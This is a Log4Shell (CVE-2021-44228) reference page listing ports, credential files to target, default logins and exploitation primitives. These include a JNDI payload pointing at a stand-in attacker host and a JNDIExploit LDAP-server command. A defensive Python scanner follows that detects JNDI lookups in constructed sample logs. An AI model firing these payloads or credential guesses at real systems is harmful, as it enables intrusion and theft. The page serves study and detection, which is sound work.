Log4Shell (Log4j JNDI)
Tags: Log4Shell, Log4j, CVE-2021-44228, JNDI Injection
Log4Shell (CVE-2021-44228) is a critical remote code execution (RCE) vulnerability in Apache Log4j 2. A JNDI lookup string injected into any input that gets logged is resolved by Log4j, which allows unauthenticated remote code execution.
Ports
| Port | Protocol | Description |
|---|---|---|
| 80 | tcp | HTTP |
| 443 | tcp | HTTPS |
| 389 | tcp | LDAP |
| 1389 | tcp | LDAP (JNDI) |
Fingerprints
| Banner / Probe | Expected Response |
|---|---|
| nmap -sV -p <port> <target> | Service banner and version info |
| nc -nv <target> <port> | Raw banner grab |
Key Files
| Path | Description |
|---|---|
| /etc/passwd | List of system users |
| /etc/shadow | Password hashes for local users |
| /etc/ssh/sshd_config | SSH server configuration |
| ~/.ssh/id_rsa | SSH private key |
Default Credentials
| Username | Password | Context |
|---|---|---|
| admin | admin | Generic admin account |
| root | root | Generic root account |
Known CVEs
| Identifier | Type | Description |
|---|---|---|
| CVE-2021-44228 | RCE | Log4Shell: JNDI lookup RCE in Log4j |
| CVE-2021-45046 | RCE | Log4j 2.15.0 insufficient fix bypass |
Exploitation Primitives
| Technique | Tool / Command | Result |
|---|---|---|
| JNDI Injection | ${jndi:ldap://<attacker>/a} | Trigger JNDI lookup |
| LDAP Server | java -jar JNDIExploit.jar -i <attacker> | Host malicious LDAP server |
Notes
Payload: `${jndi:ldap://attacker.com/a}` in any user-controlled input field.
Headers like `User-Agent`, `X-Forwarded-For`, and `Authorization` are common injection vectors.
Tools: `JNDIExploit`, `marshalsec`, `log4j-scan`.
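Because the lookup string can arrive in any logged field, the practical detection problem is finding it in the logs you already collect. The scanner below is an added example written for this page; it is not code from the Log4j project or from any of the tools named above. It walks a few constructed Apache-style access-log lines (the IP addresses are from documentation ranges and the lines are invented), lower-cases and URL-decodes each one, collapses nested `${...}` lookup expressions with a simplified rule (an assumption of this example, not Log4j's exact interpolation), and reports every `${jndi:<protocol>:` it finds together with the host it points at.

```python
"""Scan web access-log lines for Log4Shell-style JNDI lookup strings.

Added example for this page; not code from the Log4j project or from
JNDIExploit, marshalsec or log4j-scan.
"""
import re
from urllib.parse import unquote

# Innermost ${key:arg} lookup that is not itself a jndi lookup.
_INNER_LOOKUP = re.compile(r"\$\{(?!jndi:)[^${}]*?:([^${}]*)\}")

# What we flag once a line is normalized: ${jndi:<protocol>:[//]<host[:port]>
_JNDI = re.compile(r"\$\{jndi:([a-z]+):(?://)?([^/}\s]*)")

# Constructed sample log lines (Apache combined format, User-Agent last).
# Hosts use documentation address space; none of this is real traffic.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.9 - - [10/Dec/2021:14:02:15 +0000] "GET /login HTTP/1.1" 200 88 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:14:02:19 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fb%7D HTTP/1.1" 200 88 "-" "curl/7.79.1"',
    '10.0.0.12 - - [10/Dec/2021:14:02:30 +0000] "GET /about HTTP/1.1" 200 910 "-" "curl/7.79.1"',
]


def normalize(text: str) -> str:
    """Lower-case, URL-decode and collapse nested lookup expressions.

    Log4j resolves ${...} expressions from the inside out, so a nested lookup
    can hide the jndi prefix from a naive substring match. Replacing each
    innermost non-jndi lookup with its argument until nothing changes is a
    simplification of that behaviour that is good enough for log triage
    (an assumption of this example, not Log4j's real interpolation rules).
    unquote() is applied twice so double-encoded query strings decode too.
    """
    text = unquote(unquote(text)).lower()
    while True:
        collapsed = _INNER_LOOKUP.sub(lambda m: m.group(1), text)
        if collapsed == text:
            return text
        text = collapsed


def scan_lines(lines):
    """Return one dict per JNDI lookup found: line number, protocol, target host, raw line."""
    hits = []
    for number, raw in enumerate(lines, 1):
        norm = normalize(raw)
        for match in _JNDI.finditer(norm):
            hits.append({
                "line": number,
                "protocol": match.group(1),
                "target": match.group(2),
                "raw": raw,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG):
        print(f"line {hit['line']}: JNDI lookup via {hit['protocol']} to {hit['target']}")
```

The target host is the useful pivot for response: it is the server the vulnerable JVM would have connected to, so it belongs in outbound-connection searches and blocklists, and any hit should be followed by a check of whether the logging host was actually running an affected Log4j version.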
Seen on
Shodan, Censys, FOFA, ZoomEye